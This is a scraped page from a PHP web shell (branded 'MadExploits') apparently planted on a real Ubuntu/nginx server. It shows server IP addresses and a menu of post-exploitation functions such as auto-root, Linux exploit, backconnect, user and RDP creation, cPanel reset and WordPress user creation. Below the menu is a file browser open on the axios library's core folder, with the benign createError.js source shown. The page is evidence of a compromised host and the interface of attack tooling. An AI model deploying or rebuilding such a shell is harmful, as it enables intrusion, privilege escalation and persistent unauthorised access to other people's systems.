Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
axios /
lib /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
Axios.js
2.14
KB
-rw-r--r--
InterceptorManager.js
1.22
KB
-rw-r--r--
README.md
336
B
-rw-r--r--
createError.js
625
B
-rw-r--r--
dispatchRequest.js
2.15
KB
-rw-r--r--
enhanceError.js
592
B
-rw-r--r--
settle.js
757
B
-rw-r--r--
transformData.js
550
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : createError.js
'use strict'; var enhanceError = require('./enhanceError'); /** * Create an Error with the specified message, config, error code, request and response. * * @param {string} message The error message. * @param {Object} config The config. * @param {string} [code] The error code (for example, 'ECONNABORTED'). * @param {Object} [request] The request. * @param {Object} [response] The response. * @returns {Error} The created error. */ module.exports = function createError(message, config, code, request, response) { var error = new Error(message); return enhanceError(error, config, code, request, response); };
Close